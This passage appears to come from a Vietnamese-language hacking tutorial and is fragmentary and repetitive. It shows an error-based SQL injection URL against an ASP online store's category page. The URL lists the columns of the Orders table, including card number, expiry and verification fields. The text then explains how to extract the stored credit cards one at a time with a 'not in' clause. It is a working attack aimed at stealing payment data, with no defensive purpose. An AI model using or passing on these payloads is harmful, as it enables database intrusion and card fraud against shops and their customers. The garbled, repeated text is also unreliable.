... sau:http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City','State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','CardAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONumber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','ShippingLastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountry','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FREEShippingMethod'))) ... sp_passwordlay' cc thu 2 thi ta them vao o sao from orders where cardnumber not in('so card dau tien')va lan luot lay het cac credit card co tren do'nhu cai shop o tren thi de dung cho ... sau:http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City','State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','CardAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONumber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','ShippingLastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountry','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FREEShippingMethod')))...